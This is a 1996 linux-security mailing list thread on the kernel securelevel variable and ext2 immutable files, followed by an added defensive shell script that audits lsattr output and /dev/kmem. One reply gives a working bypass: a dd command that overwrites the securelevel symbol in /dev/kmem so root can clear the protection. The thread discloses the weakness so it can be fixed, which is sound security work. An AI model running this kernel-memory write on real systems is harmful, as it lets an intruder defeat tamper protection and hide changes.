has anyone played with the securelevel variable in the kernel and the
immutable flags in the ext2 file system?

The only way I have found to change the flag is by patching sched.c from

        int securelevel=0
to      int securelevel=1

The sysctrl code seems to allow the setting of the flag only by init (PID=1) and only upwards (0->1, etc). The problem is that I haven't found a way to get init to set the securelevel variable.

Is securelevel used in the Linux community?

[ Mod: If you have a look at securelevel code you can see that at this moment the only process that can change securelevel is init. From what I gather, even though the basic support for securelevel is already in kernel, it is so basic that nothing can be done in a stock kernel. Someone also was working on a project of bringing POSIX.6 privs to linux but the last patch that I have seen was against 2.0 kernel. Those who are interested in merging two patches should have a look at http://www.xarius.demon.co.uk/software/posix6/ -- alex ]
Tronicek Zdenek student 6_96_97 k336
1996-Nov-20 09:58 UTC
Re: [linux-security] Chattr +i and securelevel
> has anyone played with the securelevel variable in the kernel and the
> immutable flags in the ext2 file system?
>
> The only way I have found to change the flag is by
> patching sched.c from
>
>         int securelevel=0
> to      int securelevel=1
>
> The sysctrl code seems to allow the setting of the flag
> only by init (PID=1) and only upwards (0->1, etc).
> The problem is that I haven't found a way to get
> init to set the securelevel variable.
> Is securelevel used in the Linux community?

Once you are root, you can change securelevel this way (0x001a8f64 == 1740644):

# cat /proc/sys/kernel/securelevel
1
# cat /proc/ksyms | grep securelevel
001a8f64 securelevel
# dd if=/dev/zero of=/dev/kmem seek=1740644 bs=1 count=1
1+0 records in
1+0 records out
# cat /proc/sys/kernel/securelevel
0
#

And now you are the king of the machine :)

Zdenek Tronicek, CTU Prague

[mod: Yes. the "securelevel" implementation is VERY preliminary. A college student would need about 1-8 hours to get to the point that this and many other methods wouldn't work anymore. In short: Someone, get out of your bed and DO IT! -- REW.]
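The thread above turns on two facts a defender wants to verify on a given host: whether the files that matter actually carry the ext2 immutable flag, and whether the kernel still exposes the /dev/kmem and securelevel interfaces the reply relies on. The following audit helper is an added example written for this page; it is not code from either post or from the kernel. The lsattr-style lines are constructed sample data, the /etc and /bin paths in them are illustrative, and the function names (missing_immutable, kmem_present, securelevel_value) are hypothetical. It assumes the lsattr output format of one attribute string followed by one path per line, with a lowercase "i" marking the immutable flag.

```shell
#!/bin/sh
# Added audit helper, not code from either post above.
# Constructed lsattr-style output: attribute string, then path. A lowercase
# "i" in the attribute string is the ext2 immutable flag set by chattr +i.
SAMPLE_LSATTR='----i---------e---- /etc/passwd
--------------e---- /etc/shadow
----i---------e---- /bin/login
--------------e---- /sbin/init'

# Read lsattr output on stdin and print each path whose attribute string
# lacks the immutable flag. Feed it real output with:
#   lsattr /etc/passwd /etc/shadow /bin/login | missing_immutable
missing_immutable() {
    while read -r attrs path; do
        case "$attrs" in
            *i*) ;;                         # immutable flag present
            *)   printf '%s\n' "$path" ;;   # flag missing: report it
        esac
    done
}

# Return 0 when /dev/kmem exists as a character device on this host. The
# reply above clears securelevel by writing to it, so on a kernel built
# without /dev/kmem that route is gone; where it is present, the flag is
# only as strong as root's access to kernel memory.
kmem_present() {
    [ -c /dev/kmem ]
}

# Print the current securelevel, or "absent" when the kernel provides no
# /proc/sys/kernel/securelevel entry at all.
securelevel_value() {
    if [ -r /proc/sys/kernel/securelevel ]; then
        cat /proc/sys/kernel/securelevel
    else
        echo absent
    fi
}

# Stand-alone run: audit the constructed sample and report host state.
printf '%s\n' "$SAMPLE_LSATTR" | missing_immutable
if kmem_present; then echo "/dev/kmem present"; else echo "/dev/kmem absent"; fi
echo "securelevel: $(securelevel_value)"
```

On the constructed sample the audit lists /etc/shadow and /sbin/init as lacking +i. The two host checks are deliberately separate from the parser: a missing immutable flag is a configuration gap you fix with chattr, whereas a writable /dev/kmem is a property of the kernel build that no file attribute can compensate for, which is the point the moderator's closing note makes.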